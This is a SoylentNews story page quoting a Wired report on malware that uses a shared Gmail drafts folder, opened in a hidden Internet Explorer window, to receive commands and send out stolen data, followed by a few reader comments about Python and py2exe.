Stories
Slash Boxes
Comments

SoylentNews is people

Hackers are Using Gmail Drafts to Update their Malware and Steal Data.

posted by LaminatorX on Wednesday October 29 2014, @06:01PM   Printer-friendly
from the draft-dodging dept.

AnonTechie writes with an article from Wired:

In his career-ending extramarital affair that came to light in 2012, General David Petraeus used a stealthy technique to communicate with his lover Paula Broadwell: the pair left messages for each other in the drafts folder of a shared Gmail account. Now hackers have learned the same trick. Only instead of a mistress, they’re sharing their love letters with data-stealing malware buried deep on a victim’s computer.

Here’s how the attack worked in the case Shape observed: The hacker first set up an anonymous Gmail account, then infected a computer on the target’s network with malware. (Shape declined to name the victim of the attack.) After gaining control of the target machine, the hacker opened their anonymous Gmail account on the victim’s computer in an invisible instance of Internet Explorer—IE allows itself to be run by Windows programs so that they can seamlessly query web pages for information, so the user has no idea a web page is even open on the computer.

With the Gmail drafts folder open and hidden, the malware is programmed to use a Python script to retrieve commands and code that the hacker enters into that draft field. The malware responds with its own acknowledgments in Gmail draft form, along with the target data it’s programmed to exfiltrate from the victim’s network. All the communication is encoded to prevent it being spotted by intrusion detection or data-leak prevention. The use of a reputable web service instead of the usual IRC or HTTP protocols that hackers typically use to command their malware also helps keep the hack hidden.

 
This discussion has been archived. No new comments can be posted.
Hackers are Using Gmail Drafts to Update their Malware and Steal Data. | Log In/Create an Account | Top | 24 comments | Search Discussion
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.

  • (Score: 2) by arslan on Wednesday October 29 2014, @10:25PM

    by arslan (3462) on Wednesday October 29 2014, @10:25PM (#111365)

    So if the victim's computer doesn't have python to begin with, it will install the runtime? Wouldn't that immediately be a red flag?

    Nothing against the language.. although those "No curly braces" zealots can get a little annoying at times.

    Starting Score:    1  point
    Karma-Bonus Modifier   +1  
    Total Score:   2  

  • (Score: 1) by keithzg on Wednesday October 29 2014, @10:42PM

    by keithzg (4842) on Wednesday October 29 2014, @10:42PM (#111372)

    Well, you can compile Python code into Windows binaries trivially enough (see for example py2exe). In this day and age, the slight increase in space of the compiled exe probably isn't a big deal, and it's a hell of a lot easier to use that to call Windows APIs (which they'd probably have to do if they're actually using IE for this) than writing such from scratch, or (shudder) using Microsoft's compilers.

    Not saying the story doesn't seem a bit weird, just that there's no reason to believe they'd actually need to rely on the normal runtime.

    • (Score: 2) by arslan on Thursday October 30 2014, @01:43AM

      by arslan (3462) on Thursday October 30 2014, @01:43AM (#111401)

      That is not running Python, it is running native code coverted from py2exe. Your source is in python. Unless I'm mistaken, the summary reads like it is running Python...